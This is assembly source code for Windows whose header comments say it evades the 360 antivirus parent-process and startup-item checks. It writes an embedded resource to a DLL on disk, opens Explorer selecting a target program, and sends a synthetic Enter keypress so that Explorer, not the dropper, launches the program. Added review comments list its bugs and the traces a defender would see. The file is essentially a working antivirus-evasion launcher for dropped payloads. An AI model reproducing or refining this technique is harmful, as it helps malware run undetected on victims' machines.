;落笔飞花笑百生
;2014.12.9
;过360父进程一个弱弱的方法
;过360启动项
.386
.model flat,stdcall
option casemap:none
include windows.inc
includelib kernel32.lib
include kernel32.inc
include user32.inc
includelib user32.lib
include C:\Users\巫师\Desktop\RadASM\masm32\macros\Strings.mac
dll equ 105                     ; resource ID of the RCDATA payload that FindResource looks up in .code
.const
.data
windowname byte 100 dup (?)     ; receives the folder-name substring copied out of 'tests'; passed to FindWindow as the window title
tests byte "C:\Program Files\tlxsoft\屏幕录像专家 共享版 V2014\屏录专家.exe",0   ; path scanned backwards for its last two '\' to isolate the parent folder name
version OSVERSIONINFOEX>        ; NOTE(review): MASM expects `OSVERSIONINFOEX <>` here; as written this line does not assemble. dwOSVersionInfoSize is also never set before the GetVersionEx call
explorerpatch byte "explorer /e, /select, "     ; no terminator on purpose: relies on 'exepatch' being laid out immediately after it so WinExec sees one command line
exepatch byte "C:\Program Files\tlxsoft\屏幕录像专家 共享版 V2014\屏录专家.exe",0   ; exe path explorer is told to select; completes the command line above
;exepatch byte 260 dup(?)
dllpatch byte 260 dup (?)       ; current directory + dllname: the output path handed to CreateFile
dllname byte "/xx.dll",0        ; appended to dllpatch by lstrcat (NOTE(review): forward slash rather than '\' — confirm CreateFile accepts it here)
dllpoiter dd 00                 ; pointer returned by LockResource
dllsize dd 00                   ; first holds the HRSRC from FindResource, later overwritten with the byte count from SizeofResource
filehandle dd 00                ; HANDLE returned by CreateFile
filewriteold dd 00              ; lpNumberOfBytesWritten for WriteFile
.code
;-----------------------------------------------------------------------
; start — program entry (Win32, flat, stdcall)
; 1. Derives the parent folder name of the path in 'tests' into
;    'windowname' (the bytes between the last two '\').
; 2. Writes RCDATA resource 'dll' to <current directory>/xx.dll.
; 3. Runs "explorer /e, /select, <exe path>", sleeps 2 s, finds the
;    resulting CabinetWClass window by that folder name, brings it to the
;    foreground, sends an Enter key press/release, then WM_CLOSE to it.
; Scan-loop registers: eax = byte pointer walking backwards over 'tests',
; ecx = loop counter (index of the byte at eax, plus one), ebx = ecx at
; the first '\' met (the last one in the string), edi = ecx at the second
; '\' met. Later: esi/edi/ecx are the rep movsb source/destination/count.
; Review notes (code left as-is): no API return value is checked, so a
; failed CreateFile/FindResource/FindWindow still has its result used;
; the window handle is parked in edx across several API calls, and edx is
; caller-saved under stdcall, so the final SendMessage may receive a
; clobbered value; nothing follows the last call (no ExitProcess/ret), so
; confirm how the process is meant to terminate.
; From a defender's view the observable sequence is: a DLL written beside
; the process, explorer.exe started with "/e, /select," by a non-shell
; parent, synthetic keyboard input via keybd_event, and a WM_CLOSE sent
; to the Explorer window shortly after.
;-----------------------------------------------------------------------
start:
mov eax,offset tests            ; eax = start of the path string
mov ebx,sizeof tests            ; ebx = byte count including the terminating 0
add eax,ebx ;eax = tests + sizeof tests (author: "now points at the trailing 0"); the dec below steps back one byte before each read
mov ecx,ebx                     ; ecx = loop counter (one per byte)
xor ebx,ebx                     ; ebx = 0: "last '\' not seen yet"
xor edi,edi                     ; edi = 0: "second-to-last '\' not seen yet"
lop:
dec eax                         ; move to the previous byte
mov dl,byte ptr [eax]           ; dl = *eax
cmp dl,'\'
je xx                           ; backslash found
jmp yy                          ; otherwise keep scanning
xx:
cmp ebx,0                       ; first backslash met? (test ebx,ebx is the usual idiom; behavior identical)
jne cc
mov ebx,ecx;first '\' seen scanning backwards (= the last one in the string); remember its counter value
jmp yy
cc:
mov edi,ecx;second '\' seen (the one before the folder name); remember its counter value
mov ecx,0                       ; counter no longer needed; loop is exited below
jmp loopend
yy:
loop lop                        ; ecx -= 1; continue while ecx != 0 (never reaches the front of the buffer if both '\' exist)
loopend:;here EDI = counter at the earlier '\' and EBX = counter at the last '\'; the bytes between them are the folder name
mov eax,offset tests;base address of the string
ADD eax,edi                     ; eax = tests + edi = first byte of the folder name (edi is index+1 of the '\')
add edi,1
sub ebx,edi;ebx = length of the folder name (bytes strictly between the two '\')
;copy the ebx-byte string starting at eax into windowname; movs does the work
mov ecx,ebx                     ; ecx = byte count for rep movsb
cld                             ; forward direction for movsb
mov esi,eax                     ; esi = source
mov edi,offset windowname;edi = destination: the folder-name buffer
rep movsb                       ; windowname[0..ebx) = folder name (no terminator written; buffer was declared with dup (?))
invoke GetCurrentDirectory,260,offset dllpatch          ; dllpatch = current directory (return value unchecked)
invoke lstrcat,addr dllpatch,addr dllname               ; dllpatch += "/xx.dll"
invoke CreateFile,addr dllpatch,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL   ; create/truncate the output file
mov filehandle,eax;file handle (INVALID_HANDLE_VALUE on failure is not checked)
invoke FindResource,NULL,dll,RT_RCDATA                  ; eax = HRSRC of resource 105
mov dllsize,eax                                         ; dllsize temporarily holds the HRSRC
invoke LoadResource,NULL, dllsize                       ; eax = HGLOBAL for that HRSRC
invoke LockResource,eax                                 ; eax = pointer to the resource bytes
mov dllpoiter,eax;resource address in hand
invoke SizeofResource,NULL, dllsize                     ; eax = resource size in bytes (dllsize still holds the HRSRC here)
mov dllsize,eax;file size in hand
invoke WriteFile, filehandle, dllpoiter, dllsize, filewriteold,NULL   ; write the resource bytes to xx.dll
;invoke GetModuleFileName,NULL,offset exepatch,sizeof exepatch
invoke WinExec,offset explorerpatch,SW_SHOW             ; command line = explorerpatch immediately followed by exepatch
invoke GetVersionEx,offset version                      ; result unused; the version branch below is commented out (and dwOSVersionInfoSize was never set)
;.if version.dwMajorVersion==5 && version.dwMinorVersion==1;XP: no need to simulate, just run it directly..
;jmp yy
;.endif
;yy:
invoke Sleep,2000                                       ; give explorer time to open its window
invoke FindWindow,$CTA0("CabinetWClass"),offset windowname   ; eax = Explorer window whose title is the folder name (0 if not found)
mov edx,eax                     ; keep the HWND in edx — NOTE(review): edx is caller-saved and the calls below may overwrite it
invoke SetForegroundWindow,eax                          ; bring that window to the front
;;xxx code
invoke keybd_event,VK_RETURN ,0,KEYEVENTF_EXTENDEDKEY,0 ; Enter key down
invoke keybd_event,VK_RETURN ,0,KEYEVENTF_KEYUP,0       ; Enter key up
invoke SendMessage,edx,WM_CLOSE,0,0                     ; close the Explorer window (edx may no longer hold the HWND, see note above)
end start